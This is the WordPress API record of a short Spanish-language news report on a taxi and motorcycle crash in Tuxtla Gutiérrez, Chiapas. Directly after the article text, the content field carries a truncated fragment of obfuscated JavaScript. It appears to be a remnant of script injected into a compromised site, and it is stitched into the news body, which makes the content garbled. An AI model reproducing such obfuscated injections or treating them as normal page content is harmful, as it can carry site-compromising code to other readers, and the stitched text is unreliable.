{"id":6845,"date":"2022-11-22T05:01:07","date_gmt":"2022-11-22T05:01:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6845"},"modified":"2022-11-22T05:01:07","modified_gmt":"2022-11-22T05:01:07","slug":"taxi-y-moto-colisionan-en-la-avenida-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6845","title":{"rendered":"Taxi y moto colisionan en la Avenida Central"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033-1024x768.jpg\" alt=\"\" class=\"wp-image-6846\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221121-WA0033.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un motorrepartidor y un taxista protagonizaron una accidente en la Avenida Central, entre Novena y d\u00e9cima Oriente, este lunes por la tarde.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando el conductor de la moto se estamp\u00f3 contra el Nissan Tsuru, cuando el carro di\u00f3 vuelta en &#8220;U&#8221;, lo que gener\u00f3 la colisi\u00f3n.Por el golpe el taxista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil municipal para valorar al herido, que result\u00f3 con golpes en el cuerpo.El conductor, del taxi di\u00e1logo con el lesionado y se comprometi\u00f3 a reparar los da\u00f1os ocasionados por el accidente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un motorrepartidor y un taxista protagonizaron una accidente en la Avenida Central, entre Novena y d\u00e9cima Oriente, este lunes por la tarde.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando el conductor de la moto se estamp\u00f3 contra el Nissan Tsuru, cuando el carro &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6846,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6845","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6845","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6845"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6845\/revisions"}],"predecessor-version":[{"id":6847,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6845\/revisions\/6847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6846"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}